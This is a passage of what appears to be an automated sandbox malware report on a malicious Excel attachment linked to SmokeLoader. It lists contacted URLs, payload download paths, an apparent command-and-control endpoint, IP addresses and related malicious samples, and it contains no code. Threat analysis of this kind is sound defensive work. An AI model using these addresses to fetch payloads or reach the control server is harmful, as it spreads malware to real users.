            • Avira URL Cloud: malware
            unknown
            http://z2.ink/zBODfalse
            • 6%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634true
            • 13%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            http://198.46.177.156/xampp/msdc/ms/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doctrue
            • 8%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://198.46.177.156/9090/lionsarekingofjungleimageshere.bmptrue
            • 8%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://duckduckgo.com/chrome_newtabexplorer.exe, 00000012.00000003.529099561.0000000000928000.00000004.00000020.00020000.00000000.sdmp, D165.tmp.18.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://prolinice.ga/ndex.phpexplorer.exe, 00000012.00000002.533939539.0000000000919000.00000004.00000020.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://duckduckgo.com/ac/?q=explorer.exe, 00000012.00000003.529099561.0000000000928000.00000004.00000020.00020000.00000000.sdmp, D165.tmp.18.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://ocsp.entrust.net03wscript.exe, 00000009.00000003.424493322.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423160214.000000000320E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423208431.0000000003211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425220079.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426394366.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426408466.0000000003210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.470731184.0000000004DDE000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://contoso.com/Licensepowershell.exe, 0000000C.00000002.461385343.00000000031D9000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://198.46.177.156/9090/lionsarekingofjungleimageshere.bmpCaEQNEDT32.EXE, 00000008.00000002.418954890.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0wscript.exe, 00000009.00000002.426394366.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.470731184.0000000004DDE000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://analytics.paste.eewscript.exe, 00000009.00000003.425011208.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425210684.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.424243135.00000000008DB000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.diginotar.nl/cps/pkioverheid0wscript.exe, 00000009.00000003.424493322.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423160214.000000000320E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423208431.0000000003211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425220079.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426394366.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426408466.0000000003210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.470731184.0000000004DDE000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://www.google.comwscript.exe, 00000009.00000003.425011208.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425210684.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.424243135.00000000008DB000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://paste.ee/d/oTxeDgwscript.exe, 00000009.00000002.425503976.0000000000856000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.424243135.0000000000831000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://contoso.com/powershell.exe, 0000000C.00000002.461385343.00000000031D9000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.461385343.00000000031D9000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://paste.ee/wscript.exe, 00000009.00000002.426394366.00000000031D5000.00000004.00000020.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.autoitscript.com/autoit3explorer.exe, 0000000E.00000002.618110460.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.471758119.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://cdnjs.cloudflare.comwscript.exe, 00000009.00000003.425011208.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425210684.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.424243135.00000000008DB000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://cdnjs.cloudflare.com;wscript.exe, 00000009.00000003.425011208.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425210684.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.424243135.00000000008DB000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://ocsp.entrust.net0Dwscript.exe, 00000009.00000003.424493322.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423160214.000000000320E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423208431.0000000003211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425220079.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426408466.0000000003210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.470731184.0000000004DDE000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://z2.ink/z2.ink.url.4.drfalse
            • 7%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.548145744.0000000002491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.461385343.00000000021B1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://secure.gravatar.comwscript.exe, 00000009.00000003.425011208.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425210684.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.424243135.00000000008DB000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.piriform.com/ccleanerxeexplorer.exe, 0000000E.00000002.618932135.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.472022909.000000000260E000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.461385343.00000000031D9000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://crl.entrust.net/server1.crl0wscript.exe, 00000009.00000003.424493322.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423160214.000000000320E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423208431.0000000003211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425220079.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426394366.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426408466.0000000003210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.470731184.0000000004DDE000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://prolinice.ga/explorer.exe, 00000012.00000002.533939539.0000000000919000.00000004.00000020.00020000.00000000.sdmptrue
            • 4%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://z2.ink/zBODyX~DF21EDD1AA520133CC.TMP.1.dr, 6B430000.1.drfalse
            • 6%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://www.google.com;wscript.exe, 00000009.00000003.425011208.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425210684.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.424243135.00000000008DB000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://contoso.com/Iconpowershell.exe, 0000000C.00000002.461385343.00000000031D9000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=explorer.exe, 00000012.00000003.529099561.0000000000928000.00000004.00000020.00020000.00000000.sdmp, D165.tmp.18.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchexplorer.exe, 00000012.00000003.529099561.0000000000928000.00000004.00000020.00020000.00000000.sdmp, D165.tmp.18.drfalse
            • URL Reputation: safe
            unknown
            http://198.46.177.156/9090/lionsarekingofjungleimageshere.bmpjEQNEDT32.EXE, 00000008.00000002.418954890.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://www.google.com/favicon.icoD165.tmp.18.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://prolinice.ga/index.php1explorer.exe, 00000012.00000002.533939539.0000000000914000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://ac.ecosia.org/autocomplete?q=explorer.exe, 00000012.00000003.529099561.0000000000928000.00000004.00000020.00020000.00000000.sdmp, D165.tmp.18.drfalse
            • URL Reputation: safe
            unknown
            http://java.sun.comexplorer.exe, 0000000E.00000002.618110460.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.471758119.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0wscript.exe, 00000009.00000003.424493322.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423160214.000000000320E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423208431.0000000003211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425220079.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426394366.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426408466.0000000003210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.470731184.0000000004DDE000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://uploaddeimagens.com.br/images/00powershell.exe, 0000000C.00000002.470731184.0000000004DBF000.00000004.00000020.00020000.00000000.sdmptrue
            • 3%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 0000000E.00000002.618932135.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.620228851.0000000007982000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.472866046.000000000798D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.619575360.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.472316615.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.472022909.000000000260E000.00000004.00000001.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://mbhaudjprbp.net/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 0000000E.00000002.620228851.00000000079A4000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://uploaddeimagens.com.brpowershell.exe, 0000000C.00000002.461385343.00000000022EA000.00000004.00000800.00020000.00000000.sdmptrue
            • 7%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 00000012.00000002.533939539.0000000000919000.00000004.00000020.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://analytics.paste.ee;wscript.exe, 00000009.00000003.425011208.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425210684.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.424243135.00000000008DB000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://paste.ee/d/oTxeDbZ~Awscript.exe, 00000009.00000002.425503976.0000000000814000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.piriform.com/ccleanerexplorer.exe, 0000000E.00000002.618932135.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.620228851.0000000007982000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.472866046.000000000798D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.619575360.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.472316615.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.472022909.000000000260E000.00000004.00000001.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://paste.ee/d/oTxeD9wscript.exe, 00000009.00000003.425011208.0000000002FE0000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://support.mozilla.orgexplorer.exe, 0000000E.00000002.618110460.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.471758119.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://prolinice.ga/index.phpMozilla/5.0explorer.exe, 00000012.00000002.533939539.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.519823879.00000000000DE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.524986516.0000000000824000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.618324003.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.565061083.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.618284548.0000000000314000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.618129405.000000000029E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.618251416.0000000000824000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.618233740.00000000003AE000.00000004.00000020.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://secure.comodo.com/CPS0wscript.exe, 00000009.00000003.424493322.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423160214.000000000320E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423208431.0000000003211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425220079.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426394366.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426408466.0000000003210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.470731184.0000000004DDE000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=explorer.exe, 00000012.00000003.529099561.0000000000928000.00000004.00000020.00020000.00000000.sdmp, D165.tmp.18.drfalse
            • URL Reputation: safe
            unknown
            https://themes.googleusercontent.comwscript.exe, 00000009.00000003.425011208.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425210684.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.424243135.00000000008DB000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://crl.entrust.net/2048ca.crl0wscript.exe, 00000009.00000003.424493322.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423160214.000000000320E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.423208431.0000000003211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.425220079.0000000003210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.426408466.0000000003210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.470731184.0000000004DDE000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=explorer.exe, 00000012.00000003.529099561.0000000000928000.00000004.00000020.00020000.00000000.sdmp, D165.tmp.18.drfalse
            • Avira URL Cloud: safe
            unknown
            http://mbhaudjprbp.net/explorer.exe, 0000000E.00000002.620228851.00000000079A4000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            54.241.153.192
            z2.inkUnited States
            16509AMAZON-02UStrue
            77.232.129.190
            prolinice.gaRussian Federation
            42145BSTV-ASRUtrue
            188.114.97.3
            paste.eeEuropean Union
            13335CLOUDFLARENETUStrue
            198.46.177.156
            unknownUnited States
            36352AS-COLOCROSSINGUStrue
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1448373
            Start date and time:2024-05-28 09:28:48 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 8m 35s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed:29
            Number of new started drivers analysed:1
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:1
            Technologies:
            • HCA enabled
            • EGA enabled
            • GSI enabled (VBA)
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:#20240627_Edlen_B.xls
            Detection:MAL
            Classification:mal100.spre.bank.troj.spyw.expl.evad.winXLS@32/35@12/4
            EGA Information:
            • Successful, ratio: 80%
            HCA Information:
            • Successful, ratio: 97%
            • Number of executed functions: 151
            • Number of non-executed functions: 101
            Cookbook Comments:
            • Found application associated with file extension: .xls
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Active ActiveX Object
            • Active ActiveX Object
            • Scroll down
            • Close Viewer
            • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 104.208.16.93
            • Excluded domains from analysis (whitelisted): onedsblobprdcus07.centralus.cloudapp.azure.com, watson.microsoft.com, legacywatson.trafficmanager.net
            • Execution Graph export aborted for target EQNEDT32.EXE, PID 3148 because there are no executed function
            • Execution Graph export aborted for target powershell.exe, PID 3308 because it is empty
            • Execution Graph export aborted for target rugtucw, PID 3820 because it is empty
            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            TimeTypeDescription
            00:30:54Task SchedulerRun new task: Firefox Default Browser Agent B5F9789926240BBC path: C:\Users\user\AppData\Roaming\rugtucw
            03:30:08API Interceptor41x Sleep call for process: EQNEDT32.EXE modified
            03:30:10API Interceptor54x Sleep call for process: wscript.exe modified
            03:30:13API Interceptor268x Sleep call for process: powershell.exe modified
            03:30:53API Interceptor1594x Sleep call for process: explorer.exe modified
            03:30:54API Interceptor298x Sleep call for process: taskeng.exe modified
            03:30:55API Interceptor1x Sleep call for process: rugtucw modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            54.241.153.192Bestellijst.xlsGet hashmaliciousRemcosBrowse
            • z2.ink/nZ3W
            P02405912916 .xlsGet hashmaliciousAgentTeslaBrowse
            • z2.ink/w3q3
            #20240627_Edlen_A.xlsGet hashmaliciousSmokeLoaderBrowse
            • z2.ink/nXPJ
            HSBC Customer Information.xlsGet hashmaliciousUnknownBrowse
            • z2.ink/pWJE
            HSBC Customer Information.xlsGet hashmaliciousUnknownBrowse
            • z2.ink/pWJE
            HSBC Customer Information.xlsGet hashmaliciousUnknownBrowse
            • z2.ink/pWJE
            Ref19920830281982938RT.xlsGet hashmaliciousRemcosBrowse
            • z2.ink/nLNG
            swift.xlsGet hashmaliciousUnknownBrowse
            • z2.ink/wxMX
            swift.xlsGet hashmaliciousUnknownBrowse
            • z2.ink/wxMX
            swift.xlsGet hashmaliciousUnknownBrowse
            • z2.ink/wxMX
            77.232.129.190171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeGet hashmaliciousSmokeLoaderBrowse
            • prolinice.ga/index.php
            #20240627_Edlen_A.xlsGet hashmaliciousSmokeLoaderBrowse
            • prolinice.ga/index.php
            188.114.97.3Shipping Documents.docGet hashmaliciousLokibotBrowse
            • rocheholding.top/evie3/five/fre.php
            http://worker-frosty-surf-7141.parvgee90.workers.dev/favicon.icoGet hashmaliciousHTMLPhisherBrowse
            • worker-frosty-surf-7141.parvgee90.workers.dev/favicon.ico
            http://www.lnkfi.re/1moJNQoc/Get hashmaliciousUnknownBrowse
            • cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referral
            http://twomancake.comGet hashmaliciousUnknownBrowse
            • twomancake.com/
            BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
            • fleur-de-lis.sbs/jhgfd
            Purchase Order # PO-00159.xla.xlsxGet hashmaliciousUnknownBrowse
            • qr-in.com/YXcuqXy
            LHER000698175.xlsGet hashmaliciousUnknownBrowse
            • qr-in.com/JeYCrvM
            PO 4500025813.xlsGet hashmaliciousUnknownBrowse
            • qr-in.com/RtWEZGi
            SCB REmittance Advice.docGet hashmaliciousLokibotBrowse
            • rocheholding.top/evie3/five/fre.php
            WRnJsnI1Zq.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
            • objectiveci.top/pythonpacketGamebigloadprivateCentral.php
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            prolinice.ga171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeGet hashmaliciousSmokeLoaderBrowse
            • 77.232.129.190
            #20240627_Edlen_A.xlsGet hashmaliciousSmokeLoaderBrowse
            • 77.232.129.190
            z2.inkBestellijst.xlsGet hashmaliciousRemcosBrowse
            • 54.241.153.192
            P02405912916 .xlsGet hashmaliciousAgentTeslaBrowse
            • 54.241.153.192
            #20240627_Edlen_A.xlsGet hashmaliciousSmokeLoaderBrowse
            • 54.241.153.192
            HSBC Customer Information.xlsGet hashmaliciousUnknownBrowse
            • 54.241.153.192
            HSBC Customer Information.xlsGet hashmaliciousUnknownBrowse
            • 54.241.153.192
            HSBC Customer Information.xlsGet hashmaliciousUnknownBrowse
            • 54.241.153.192
            Ref19920830281982938RT.xlsGet hashmaliciousRemcosBrowse
            • 54.241.153.192
            swift.xlsGet hashmaliciousUnknownBrowse
            • 54.241.153.192
            swift.xlsGet hashmaliciousUnknownBrowse
            • 54.241.153.192
            swift.xlsGet hashmaliciousUnknownBrowse
            • 54.241.153.192
            paste.eeBestellijst.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            Puchase.jsGet hashmaliciousAgentTeslaBrowse
            • 188.114.97.3
            #20240627_Edlen_A.xlsGet hashmaliciousSmokeLoaderBrowse
            • 188.114.96.3
            kam.vbsGet hashmaliciousUnknownBrowse
            • 188.114.96.3
            las.vbsGet hashmaliciousUnknownBrowse
            • 188.114.96.3
            upload.vbsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            Ref19920830281982938RT.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            LHER0006981753.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            upload.vbsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            uploaddeimagens.com.brBestellijst.xlsGet hashmaliciousRemcosBrowse
            • 188.114.96.3
            Puchase.jsGet hashmaliciousAgentTeslaBrowse
            • 188.114.97.3
            #20240627_Edlen_A.xlsGet hashmaliciousSmokeLoaderBrowse
            • 188.114.97.3
            kam.vbsGet hashmaliciousUnknownBrowse
            • 188.114.96.3
            las.vbsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            upload.vbsGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            Ref19920830281982938RT.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            LHER0006981753.xlsGet hashmaliciousRemcosBrowse
            • 188.114.96.3
            Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
            • 188.114.97.3
            upload.vbsGet hashmaliciousUnknownBrowse
            • 188.114.96.3
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            BSTV-ASRU171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeGet hashmaliciousSmokeLoaderBrowse
            • 77.232.129.190
            #20240627_Edlen_A.xlsGet hashmaliciousSmokeLoaderBrowse
            • 77.232.129.190
            RkdXl7E3rG.exeGet hashmaliciousAsyncRATBrowse
            • 77.232.132.25
            nMbRell419.exeGet hashmaliciousAsyncRAT, GMiner, QuasarBrowse
            • 77.232.132.25
            2ctyhHi7vb.exeGet hashmaliciousAsyncRAT, GMiner, QuasarBrowse
            • 77.232.132.25
            jOR8nr6mAC.exeGet hashmaliciousQuasarBrowse
            • 77.232.132.25
            kPl1mZTpru.exeGet hashmaliciousTofseeBrowse
            • 77.232.138.239
            mtxfh5xJDf.exeGet hashmaliciousQuasarBrowse
            • 77.232.132.25
            file.exeGet hashmaliciousTofseeBrowse
            • 77.232.132.142
            BMTxyapegR.exeGet hashmaliciousAsyncRATBrowse
            • 77.232.132.25
            CLOUDFLARENETUS86KZvDaOZR.exeGet hashmaliciousLummaC, PureLog StealerBrowse
            • 104.21.92.10
            product Inquiry and RFQ ART LTD.docGet hashmaliciousFormBookBrowse
            • 188.114.96.3
            https://digitalpersona4491.com/6ox1mkjyGet hashmaliciousUnknownBrowse
            • 188.114.97.3
            https://gclnk.com/zSArR6UdGet hashmaliciousUnknownBrowse
            • 104.21.0.122
            Bestellijst.xlsGet hashmaliciousRemcosBrowse
            • 188.114.96.3
            https://cnn.compromisedblog.com/XMVFxNmNXUGF4TTFwRzI0c0ZBenZ0YVFnWFdTRWxZZWN6M3AzdHF0QW9hYXVnQmNjelFsQS9hMDJoL1dlT1lOaHJuMUo1VVFHZFNESnZXa0JSZkhjY2p6d3FvODE5R3NTQnNSWHZtejQwbFNDdDR6QjBsbElKWS8rZ3p1RVNGdFAwV0lrTkFsNm5sYTd3RVFDM1k1ZStkV25obEdXK0tHd1dhdHBDTzRKRGFmdWxJN3BvOHFDODRpUi80MVZLWkVmQ0F4UGVZek00dWhxSjVRN29hSnEtLTN6b0tnK2YrQU1JNXprdHItLW81dDhOZUVvQmw1MVpYeG0wKzFzN3c9PQ==?cid=2022767618Get hashmaliciousUnknownBrowse
            • 104.17.24.14
